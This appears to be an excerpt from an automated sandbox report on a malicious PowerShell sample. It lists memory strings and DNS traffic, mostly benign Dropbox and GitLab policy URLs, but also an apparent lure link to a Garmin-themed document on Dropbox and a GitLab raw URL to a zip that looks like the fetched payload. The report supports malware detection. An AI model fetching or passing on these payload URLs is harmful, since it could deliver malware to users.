www.yahoo.com (Yahoo)
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: pt-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://www.paypal.com/sdk/js https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/ 'unsafe-inline' ; img-src https://* data: blob: ; frame-ancestors 'self' https://*.dropbox.com ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; font-src https://* data: ; base-uri 'self' equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                  Source: global trafficDNS traffic detected: DNS query: ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: gitlab.com
                  Source: powershell.exe, 00000010.00000002.2540762014.00000295771D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE81668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF13D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com
                  Source: powershell.exe, 0000000C.00000002.2301223891.000001FE90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2301223891.000001FE901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF4BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDB50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.000002951006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.00000295101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000010.00000002.2439845650.0000029500231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBDAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.0000029500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE81668000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                  Source: powershell.exe, 0000000E.00000002.2422979302.0000028FD5E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.o
                  Source: powershell.exe, 00000010.00000002.2439845650.0000029500231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBDAE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.0000029500001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
                  Source: powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                  Source: powershell.exe, 00000010.00000002.2439845650.0000029500231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBE712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF0FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com(
                  Source: powershell.exe, 0000000E.00000002.2422979302.0000028FD5E90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
                  Source: powershell.exe, 0000000E.00000002.2352671147.0000028FBBBE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2422979302.0000028FD5EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/garvdsf/dsfg/-/raw/main/FGa1712.zip
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/users/sign_in
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE80C32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBE712000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.0000029500C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                  Source: powershell.exe, 00000010.00000002.2544841727.0000029579508000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
                  Source: powershell.exe, 0000000C.00000002.2301223891.000001FE90070000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2301223891.000001FE901B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE819EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDC92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF4BE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2412081496.0000028FCDB50000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.000002951006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2524456797.00000295101B2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2439845650.00000295019C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
                  Source: powershell.exe, 0000000E.00000002.2354438721.0000028FBF122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF103000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2354438721.0000028FBF126000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ucb25d17b678ca30b23ff5714cb7.dl.dropboxusercontent.com/cd/0/get/CghiprcqMx-t_0kStAteoG_83aAw
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE80C32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/Garmin_Campaign_Information_for_Partners_V10.do
                  Source: powershell.exe, 0000000C.00000002.2304178313.000001FEF6766000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/q2jv8nnxln07fkzxxvzm6/garmin_campaign_information_for_partners_v10.do
                  Source: powershell.exe, 0000000C.00000002.2307737559.000001FEF8A00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/q2jv8nnxln07zx
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8164B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8164F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                  Source: powershell.exe, 0000000C.00000002.2287555017.000001FE8162A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
